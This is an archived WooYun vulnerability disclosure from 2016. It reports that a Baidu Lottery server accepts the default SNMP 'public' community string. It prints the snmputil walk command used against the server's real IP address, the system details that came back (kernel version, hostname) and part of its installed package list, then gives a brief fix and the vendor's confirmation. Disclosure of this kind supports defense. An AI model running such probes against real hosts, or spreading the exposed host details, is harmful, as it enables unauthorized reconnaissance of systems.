百度彩票某服务器存在snmp弱口令

  • A+
所属分类:乌云漏洞
摘要

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2016-185940

漏洞标题: 百度彩票某服务器存在snmp弱口令

相关厂商: 百度

漏洞作者: Yeats

提交时间: 2016-03-21 10:10

公开时间: 2016-05-05 10:56

漏洞类型: 服务弱口令

危害等级: 中

自评Rank: 5

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 弱口令 敏感信息泄漏

1人收藏


漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

百度彩票某服务器存在snmp弱口令,远程SNMP代理支持public口令。

详细说明:

百度彩票某服务器存在snmp弱口令

http://211.100.44.243/

C:/Users/think/Desktop/Tools>snmputil.exe walk 211.100.44.243 public .1.3.6.1.2.1.1

Variable = system.sysDescr.0

Value = String Linux lvs101 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64

Variable = system.sysObjectID.0

Value = ObjectID 1.3.6.1.4.1.8072.3.2.10

Variable = system.sysUpTime.0

Value = TimeTicks 3569603946

Variable = system.sysContact.0

Value = String Root <> (configure /etc/snmp/snmp.local.conf)

Variable = system.sysName.0

Value = String lvs101

Variable = system.sysLocation.0

Value = String Unknown (edit /etc/snmp/snmpd.conf)

Variable = system.8.0

Value = TimeTicks 14

Variable = system.9.1.2.1

Value = ObjectID 1.3.6.1.6.3.11.2.3.1.1

Variable = system.9.1.2.2

Value = ObjectID 1.3.6.1.6.3.15.2.1.1

Variable = system.9.1.2.3

Value = ObjectID 1.3.6.1.6.3.10.3.1.1

Variable = system.9.1.2.4

Value = ObjectID 1.3.6.1.6.3.1

Variable = system.9.1.2.5

Value = ObjectID 1.3.6.1.2.1.49

Variable = system.9.1.2.6

Value = ObjectID 1.3.6.1.2.1.4

Variable = system.9.1.2.7

Value = ObjectID 1.3.6.1.2.1.50

Variable = system.9.1.2.8

Value = ObjectID 1.3.6.1.6.3.16.2.2.1

Variable = system.9.1.3.1

Value = String The MIB for Message Processing and Dispatching.

Variable = system.9.1.3.2

Value = String The MIB for Message Processing and Dispatching.

Variable = system.9.1.3.3

Value = String The SNMP Management Architecture MIB.

Variable = system.9.1.3.4

Value = String The MIB module for SNMPv2 entities

Variable = system.9.1.3.5

Value = String The MIB module for managing TCP implementations

Variable = system.9.1.3.6

Value = String The MIB module for managing IP and ICMP implementations

Variable = system.9.1.3.7

Value = String The MIB module for managing UDP implementations

Variable = system.9.1.3.8

Value = String View-based Access Control Model for SNMP.

Variable = system.9.1.4.1

Value = TimeTicks 14

Variable = system.9.1.4.2

Value = TimeTicks 14

Variable = system.9.1.4.3

Value = TimeTicks 14

Variable = system.9.1.4.4

Value = TimeTicks 14

Variable = system.9.1.4.5

Value = TimeTicks 14

Variable = system.9.1.4.6

Value = TimeTicks 14

Variable = system.9.1.4.7

Value = TimeTicks 14

Variable = system.9.1.4.8

Value = TimeTicks 14

End of MIB subtree.

漏洞证明:

服务列表:

* festival-speechtools-libs-1.2.96-18.el6

* freeipmi-1.2.1-6.el6_5

* kde-l10n-Chinese-4.3.4-5.el6

* module-init-tools-3.9-21.el6_4

* exiv2-libs-0.18.2-2.1.el6

* kdeartwork-screensavers-4.3.4-7.el6

* freeipmi-bmc-watchdog-1.2.1-6.el6_5

* mailcap-2.1.31-2.el6

* gstreamer-python-0.10.16-1.1.el6

* samba-winbind-clients-3.6.9-169.el6_5

* plymouth-scripts-0.8.3-27.el6.centos.1

* httpd-2.2.15-31.el6.centos

* geoclue-0.11.1.1-0.13.20091026git73b6729.el6

* system-config-date-1.9.60-2.el6.centos

* dbus-c++-0.5.0-0.10.20090203git13281b3.1.el6

* xorg-x11-fonts-misc-7.2-9.1.el6

* tar-1.23-11.el6

* strigi-libs-0.7.0-2.el6

* raptor-1.4.18-5.el6_2.1

* abrt-cli-2.0.8-21.el6.centos

* popt-1.13-7.el6

* mobile-broadband-provider-info-1.20100122-2.el6

* m17n-db-oriya-1.5.5-1.1.el6

* bison-2.4.1-5.el6

* plymouth-graphics-libs-0.8.3-27.el6.centos.1

* perf-2.6.32-431.29.2.el6

* libogg-1.1.4-2.1.el6

* notify-python-0.1.1-10.el6

修复方案:

禁止缺省口令,关服务也行。

版权声明:转载请注明来源 Yeats@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-03-21 10:56

厂商回复:

感谢对百度安全的关注

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价